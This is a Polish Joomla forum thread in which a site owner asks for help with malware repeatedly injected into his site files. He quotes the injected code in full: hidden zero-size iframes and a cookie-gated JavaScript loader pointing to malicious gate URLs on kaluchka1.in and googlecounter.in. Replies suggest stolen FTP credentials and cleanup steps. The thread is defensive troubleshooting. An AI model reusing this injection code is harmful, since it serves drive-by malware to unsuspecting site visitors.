Problem z wirusem -> iframe src=http://s1.kaluchka1.in/
Wyniki 1 do 7 z 7

Temat: Problem z wirusem -> iframe src=http://s1.kaluchka1.in/

  1. #1
    Bywalec krzychoooo awatar
    Dołączył
    11-02-2009
    Wpisy
    115
    Punkty
    16

    Domyślny Problem z wirusem -> iframe src=http://s1.kaluchka1.in/

    Witam
    Co kilka dni do plików php html js dokleja mi się taki kod:
    Kod:
    <!--qpi--><iframe src=http://s1.kaluchka1.in/gate.php?f=955068   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->
    Jak coś chce zmienić na stronie to :
    - kasuje całą stronę i bazę danych.
    - przywracam stronę z kopi która w żadnym pliku nie ma takiego kodu .
    - dokonuje zmiany.
    - robię kopie (Akeea backup)

    Od jakiegoś czasu nie moge dojść skąd to się bierze.
    Joomla 1.7.3
    Ustawienia php według zaleceń, .htaccess funkcjonuje.

    Czy miał ktoś podobny problem?

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Senior nikszal awatar
    Dołączył
    07-09-2006
    Skąd
    FNW
    Wpisy
    5 288
    Punkty
    196

    Domyślny

    Cytat Wysłane przez krzychoooo Zobacz wiadomość
    Od jakiegoś czasu nie moge dojść skąd to się bierze.
    Strzelę w ciemno - zainstalowałeś jakieś rozszerzenie pochodzące z niepewnego źródła, nie daj Boże z jakiegoś wareza na przykład?

    Zmień hasła (zaplecze, serwer FTP), ściągnij witrynę na serwer lokalny i szukaj źródła problemu.
    Zanim zapytasz na Forum:
    1. Przeszukaj wątki.
    2. Poszukaj odpowiedzi na wiki.
    __________________________________________________ _________________
    Książki oddane na makulaturę dowodzą, że cierpliwość papieru też ma swoje granice.

  4. #3
    Przeglądacz
    Dołączył
    14-12-2009
    Wpisy
    98
    Punkty
    9

    Domyślny

    Prawdopodobnie wykradziono Ci hasła do ftp. Po pierwsze zmień hasła ftp, po drugie nie wpisuj ich na stałe np w TC, po trzecie dogłębnie przeskanuj komputer.

  5. #4
    Bywalec krzychoooo awatar
    Dołączył
    11-02-2009
    Wpisy
    115
    Punkty
    16

    Domyślny

    Dodatki komponenty itd pobierałem z http://extensions.joomla.org/.
    Szablon zakupiony w firmie SmartAddons.Com.
    Zainstalowany dodatek "spadaj".
    Hasło do ftp już zmieniałem.
    Komputer przeskanowany avast'em.
    Hasło nie zapisane na twardym. Hmm tylko jeśli coś mi nasłuc***e na porcie 21 to i tak przechwyci hasło.
    Czy da się w XP jakoś założyć loga co się dzieje na porcie 21?
    W plikach js jet oczywiście trochę inny wpis:
    Kod:
    /*qpi*/
    function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
    var e=new Date();e.setTime(e.getTime()+(2592000000));
    if(!g()&&window.navigator.cookieEnabled)
    {
    	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
    	window.setTimeout(function(){
    		var JSinj=document.createElement('iframe');
    		JSinj.src='http://s1.kaluchka1.in/gate.php?f=955068&r='+escape(document.referrer||'');
    		JSinj.width='0';
    		JSinj.height='0';
    		JSinj.frameborder='0';
    		JSinj.marginheight='0';
    		JSinj.marginwidth='0';
    		JSinj.border='0';
    		try{
    			document.body.appendChild(JSinj);
    		}catch(e){
    			document.documentElement.appendChild(JSinj);
    		}
    	}, 2000);
    }
    /*qpi*/

  6. #5
    Senior nikszal awatar
    Dołączył
    07-09-2006
    Skąd
    FNW
    Wpisy
    5 288
    Punkty
    196

    Domyślny

    Cytat Wysłane przez krzychoooo Zobacz wiadomość
    Komputer przeskanowany avast'em.
    Proponuję coś lepszego zainstalować. Kaspersky Internet Security nie jest drogi.
    Zanim zapytasz na Forum:
    1. Przeszukaj wątki.
    2. Poszukaj odpowiedzi na wiki.
    __________________________________________________ _________________
    Książki oddane na makulaturę dowodzą, że cierpliwość papieru też ma swoje granice.

  7. #6
    Bywalec krzychoooo awatar
    Dołączył
    11-02-2009
    Wpisy
    115
    Punkty
    16

    Domyślny

    W plikach szablonu znalazłem taki kod:
    Kod:
    <!--qpi--><iframe src=http://googlecounter.in/gate.php?f=861280   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi--><!--qpi--><!--/qpi--><!--qpi--><!--qpi-->
    na stronie googli do diagnozowania witryn
    http://google.com/safebrowsing/diagn...nter.in/&hl=pl
    Jest taki wpis:
    Kod:
    Bezpieczne przeglądanie
    Strona diagnostyczna witryny googlecounter.in
    
    Jaki jest obecny stan bezpieczeństwa witryny googlecounter.in?
    
        Ta witryna nie jest obecnie uznawana za podejrzaną.
    
    Co się stało podczas odwiedzin tej witryny przez Google?
    
        W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 880. Wyświetlanie 0 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-01-11, a po raz ostatni znaleziono w niej podejrzane treści 2012-01-11.
    
        Złośliwe oprogramowanie obejmuje 423 trojan(s), 72 exploit(s), 69 scripting exploit(s).
    
        Ta witryna działała w następującej liczbie sieci: 2, m.in. AS35017 (SWIFTWAY), AS24971 (MASTER).
    
    Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?
    
        Wydaje się, że w ciągu ostatnich 90 dni witryna googlecounter.in pośredniczyła w zarażeniu następującej liczby witryn: 125, m.in. haberunye.com/, euromarkt.pl/, lospeques.com/.
    Co to jest ten googlecounter ?

  8. #7
    Wiarus mjmartino awatar
    Dołączył
    03-12-2007
    Skąd
    Będzin /k Katowic
    Wpisy
    2 751
    Punkty
    212

    Domyślny

    Jak masz jakieś podejrzenia co do obcego iframe co jest zresztą dziwne w szablonie to go usuń i poczekaj na efekty.

    zwrócona zawartość iframe
    Kod:
    The requested URL /out.php?p=mhaBxKqEnAXIVTaOhY2k43ObuL3W2SoC0oi6MHkUwsOOmiF0ZgONSaEMHm2qXTmHFDxGZbvJNUJg43GRLptlNkBhD+jA08CshZKWHhmTzAL3FzsNDDNwPHa1Fngdwg==&nc=false&nj=false&ic=false&ds=false&iu=false&wc=false&sw=1680&sh=1050&sd=32&np=false&pm=Win32&is_iframe=false& was not found on this server.
    Czy to coś zbiera informacje a przynajmniej uzyskuje rozdzielczość głębie oraz system : )

    Poza tym domena .in wskazuje na INDIE czyli kraj wysokiego ryzyka rozsyłania różnych rzeczy.. wiec .httaccess i deny dla owej domeny; )
    ================================
    Administracja Joomla, Nowości, Artykuły Pomocne Administratorom, Usługi
    >>> https://joomlaguru.pl <<<
    Szkoła Joomla Guru (Kursy Online)
    >>> https://szkola.joomlaguru.pl <<<
    ================================

Podobne tematy

  1. iFrame - ze specyficznymi funkcjonalnościami czyli iFrame Zoom
    przez Gall Anonim na forum Rozszerzenia - problemy z obsługą, zarządzaniem
    Odpowiedzi: 2
    Ostatni post/autor: 28-03-2011, 19:10
  2. Problem z iFrame
    przez humpty na forum Administracja Joomla!
    Odpowiedzi: 0
    Ostatni post/autor: 15-05-2010, 14:52
  3. Proszę o przeanalizowanie skryptu - problem z wirusem
    przez slaweek na forum Bezpieczeństwo
    Odpowiedzi: 6
    Ostatni post/autor: 15-05-2010, 13:57
  4. Joomla zainfekowana wirusem
    przez dufia na forum Różne
    Odpowiedzi: 2
    Ostatni post/autor: 20-01-2010, 11:31
  5. Problem z wirusem (?) czy czymś w tym stylu.
    przez seseba na forum Administracja Joomla!
    Odpowiedzi: 10
    Ostatni post/autor: 20-06-2009, 07:39

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •